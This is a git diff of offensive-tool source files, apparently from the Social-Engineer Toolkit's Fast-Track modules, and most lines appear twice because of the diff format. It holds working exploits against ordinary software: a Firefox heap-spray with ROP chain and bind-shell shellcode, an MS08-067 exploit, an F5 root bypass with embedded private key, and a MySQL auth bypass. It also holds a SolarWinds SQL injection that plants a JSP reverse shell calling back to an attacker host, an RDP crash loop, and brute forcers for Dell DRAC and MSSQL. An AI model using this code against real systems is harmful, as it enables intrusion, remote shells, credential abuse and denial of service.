database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then
if path variables aren't set for msfconsole this will break, even if its specified in set_config """
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer")
child.interact()
# launch the attack
setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block
try:
child = pexpect.spawn("msfconsole -r src/program_junk/autopwn.answer")
child.interact()
# handle exceptions and log them
except Exception, error: setcore.log(error)
# handle exceptions and log them
except Exception, error: setcore.log(error)
def do_autopwn():
print 'Doing do_autopwn'
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
print 'Doing do_autopwn'
# pull the metasploit database
database = setcore.meta_database()
range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
# prep the answer file
prep(database, range)
confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]"))
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
launch()
# if we are sure, then lets do it
if confirm_attack == "yes" or confirm_attack == "y":
launch()

344
src/fasttrack/delldrac.py
View file

@ -2,7 +2,7 @@
###########################################
#
# Dell DRAC and Chassis Scanner
# Dell DRAC and Chassis Scanner
# Default Credential Check
# UN: root PW: calvin
#
@ -20,44 +20,44 @@ import sys
import time
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
print "\n"
print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
@ -84,102 +84,102 @@ ipaddr = raw_input("Enter the IP or CIDR: ")
# try logging into DRAC, chassis is something different
def login_drac(ipaddr_single):
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
# default post string
url = "https://%s/Applications/dellUI/RPC/WEBSES/create.asp" % (ipaddr_single)
# post parameters
opts = {
"WEBVAR_PASSWORD": "calvin",
"WEBVAR_USERNAME": "root",
"WEBVAR_ISCMCLOGIN": 0
}
# URL encode it
data = urllib.urlencode(opts)
# our headers to pass (taken from raw post)
headers = {
# "Host": "10.245.196.52",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/Applications/dellUI/login.htm" % (ipaddr_single),
"Content-Length": 63,
"Cookie": "test=1; SessionLang=EN",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed our login, just pass through
if "Failure_Login_IPMI_Then_LDAP" in data:
pass
# Failure_No_Free_Slot means there are no sessions available need to log someone off
if "Failure_No_Free_Slot" in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " % (ipaddr_single))
global global_check1
global_check1 = 1
# if we are presented with a username back, we are golden
if "'USERNAME' : 'root'" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell DRAC compromised! username: root and password: calvin for IP address: " + ipaddr_single)
global global_check2
global_check2 = 1
# handle failed attempts and move on
except: pass
# these are for the centralized dell chassis
def login_chassis(ipaddr_single):
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
global global_check3
global_check3 = 1
# our post URL
url = "https://%s/cgi-bin/webcgi/login" % (ipaddr_single)
# our post parameters
opts = {
"WEBSERVER_timeout": "1800",
"user": "root",
"password": "calvin",
"WEBSERVER_timeout_select": "1800"
}
# url encode
data = urllib.urlencode(opts)
# headers (taken from raw POST)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:14.0) Gecko/20100101 Firefox/14.0.1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Referer": "https://%s/cgi-bin/webcgi/login" % (ipaddr_single),
"Content-Length": 78
}
# request the page
req = urllib2.Request(url, data, headers)
try:
# capture the response
response = urllib2.urlopen(req, timeout=2)
data = response.read()
# if we failed to login
if "login_failed_hr_top" in data:
pass # login failed
# to many people logged in at a given time
if 'Connection refused, maximum sessions already in use.' in data:
print (bcolors.YELLOW + "[!]" + bcolors.ENDC + " There are to many people logged but un: root and pw: calvin are legit on IP: " + (ipaddr_single))
global global_check3
global_check3 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
global global_check4
global_check4 = 1
# successful guess of passwords
if "/cgi-bin/webcgi/index" in data:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Dell Chassis Compromised! username: root password: calvin for IP address: " + ipaddr_single)
global global_check4
global_check4 = 1
# except and move on for failed login attempts
except: pass
# except and move on for failed login attempts
except: pass
# this will check to see if we are using
# a valid IP address for scanning
@ -258,50 +258,50 @@ def bin2ip(b):
# print a list of IP addresses based on the CIDR block specified
def scan(ipaddr):
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
thread.start()
if "/" in ipaddr:
parts = ipaddr.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
if subnet == 32:
ipaddr = bin2ip(baseIP)
else:
# our base ip addresses for how many we are going to be scanning
counter = 0
# capture the threads
threads = []
ipPrefix = baseIP[:-(32-subnet)]
for i in range(2**(32-subnet)):
ipaddr_single = bin2ip(ipPrefix+dec2bin(i, (32-subnet)))
# if we are valid proceed
ip_check = is_valid_ip(ipaddr_single)
if ip_check != False:
# do this to limit how fast it can scan, anything more causes CPU to hose
if counter > 255:
# put a small delay in place
time.sleep(0.1)
# increase counter until 255 then delay 0.1
counter = counter + 1
# start our drac BF
thread = threading.Thread(target=login_drac, args=(ipaddr_single,))
# create a list of our threads in a dictionary
threads.append(thread)
# start the thread
thread.start()
# same as above just on the chassis
thread = threading.Thread(target=login_chassis, args=(ipaddr_single,))
# append the thread
threads.append(thread)
# start the thread
thread.start()
# wait for all the threads to terminate
for thread in threads:
thread.join()
# wait for all the threads to terminate
for thread in threads:
thread.join()
# if we are using a single IP address then just do this
if not "/" in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
# if we are using a single IP address then just do this
if not "/" in ipaddr:
login_drac(ipaddr)
login_chassis(ipaddr)
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " Scanning IP addresses, this could take a few minutes depending on how large the subnet range...")
@ -316,9 +316,9 @@ global_check4 = 0
# kick off the scan
scan(ipaddr)
if global_check1 or global_check2 or global_check3 or global_check4 == 1:
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
print (bcolors.GREEN + "[*]" + bcolors.ENDC + " DellDrac / Chassis Brute Forcer has finished scanning. Happy Hunting =)")
else:
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
print (bcolors.RED + "[!]" + bcolors.ENDC + " Sorry, unable to find any of the Dell servers with default creds..Good luck :(")
raw_input("Press {return} to exit.")

7
src/fasttrack/exploits/f5.py
View file

@ -7,7 +7,7 @@
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
@ -31,10 +31,9 @@ Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.secmaniac.com
"""
"""
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")

41
src/fasttrack/exploits/firefox_3_6_16.py
View file

@ -15,7 +15,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""
@ -28,7 +28,7 @@ class myRequestHandler(BaseHTTPRequestHandler):
- Win 7 fun version by mr_me</p>
<!--
Notes:
- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on mutiple tabs as
the spray is large enough to hit the 0x10000000 block.
@ -37,17 +37,17 @@ Notes:
but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc
-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
alert('ready?');
fakeobject = document.getElementById("d"); // allocate the object
fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
fakeobject.onChannelRedirect(null,new Object,0); // free it
/*
fill the object with a fake vtable reference
just use the start of a block for simplicity and use \x00
@ -55,14 +55,14 @@ function trigger(){
when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
*/
fakevtable = unescape("\x00%u1000");
var rop = "";
// 3 instructions to pivot cleanly
rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
// generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
@ -95,16 +95,16 @@ function trigger(){
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN
sc = rop;
sc = rop;
// metasploit bind shell port 4444
sc += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5");
// create a string with a ptr to the offset of our rop
// used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget)
var filler = unescape("%u001c%u1000");
while(filler.length < 0x100) {filler += filler;}
/*
create a string with 0x18 bytes at the start containing ptr's to the rop.
This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
@ -113,13 +113,13 @@ function trigger(){
var chunk = filler.substring(0,0x18/2);
chunk += sc;
chunk += filler;
// create a string of size 64k in memory that contains sc + filler
var heapblock = chunk.substring(0,0x10000/2);
// keep adding more memory that contains sc + filler to reach 512kB
while (heapblock.length<0x80000) {heapblock += heapblock;}
/*
using a final string of 512kB so that the spray is fast but ensuring accuracy
- sub the block header length (0x24)
@ -128,7 +128,7 @@ function trigger(){
- sub the null byte terminator
*/
var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);
// optimised spray, precision can still be reliable even with tabs.
// force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
arrayOfHeapBlocks = new Array()
@ -145,9 +145,9 @@ trigger();
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 4444 [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
@ -175,10 +175,7 @@ try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\n Exiting exploit...\n\n")

51
src/fasttrack/exploits/ms08067.py
View file

@ -9,10 +9,10 @@
from src.core.setcore import *
import struct
import sys
import time
import time
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
@ -23,16 +23,16 @@ except ImportError, _:
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
@ -57,8 +57,8 @@ shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
@ -72,7 +72,7 @@ payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
@ -90,23 +90,23 @@ payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
target = raw_input("Enter the IP address you want to attack: ")
print "Select target:\n\n 1. Windows 2000\n 2. Windows 2003 SP2\n"
osver = raw_input("Enter the target operating system number: ")
if osver == "1":
osver = payload_1
print '[-]Windows 2000 payload loaded'
osver = payload_1
print '[-]Windows 2000 payload loaded'
if osver == "2":
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
osver=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
@ -114,7 +114,7 @@ class SRVSVC_Exploit(Thread):
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
@ -136,19 +136,18 @@ class SRVSVC_Exploit(Thread):
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
try:
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
except:
print '[-] System appears not to be vulnerable. Sorry.'
print '[-] System appears not to be vulnerable. Sorry.'
try:
current = SRVSVC_Exploit(target, osver)
current.start()
current = SRVSVC_Exploit(target, osver)
current.start()
except:
print '[-] Target does not appear vulnerable.'
print '[-] Target does not appear vulnerable.'
print "[!] If no errors were thrown. Try connecting to victim on 4444"

5
src/fasttrack/exploits/mysql_bypass.py
View file

@ -21,9 +21,8 @@ Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then its not vulnerable.
"""
"""
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

10
src/fasttrack/exploits/rdpdos.py
View file

@ -26,8 +26,8 @@ trololo = headpack+dafuq+dafree
HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO,PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()

33
src/fasttrack/exploits/solarwinds.py
View file

@ -9,25 +9,25 @@
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################
import urllib, urllib2, cookielib
import sys
import random
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"
print "[*] Offensive Security - http://www.offensive-security.com\n"
#if (len(sys.argv) != 4):
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
#rhost = sys.argv[1]
#lhost = sys.argv[2]
#lport = sys.argv[3]
rhost = raw_input("Enter the remote host IP address: ")
lhost = raw_input("Enter the attacker IP address: ")
lport = raw_input("Enter the local port: ")
@ -36,26 +36,26 @@ filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
filename+=i
filename +=".jsp"
output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
@ -81,7 +81,7 @@ try
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
@ -90,17 +90,17 @@ try
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>'''
jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")
prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
@ -111,7 +111,6 @@ post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpay
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s" % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100

464
src/fasttrack/mssql.py
View file

@ -22,265 +22,265 @@ operating_system = setcore.check_os()
# this is for the initial discovery for scanning
def scan(range,lowport,highport):
# scan the ranges
from src.core import portscan
portscan=portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning("No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
# scan the ranges
from src.core import portscan
portscan=portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning("No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
return portscan
#
# this is the brute forcer
#
def brute(ipaddr,username,port,wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
return False
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr,port,username,password,option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
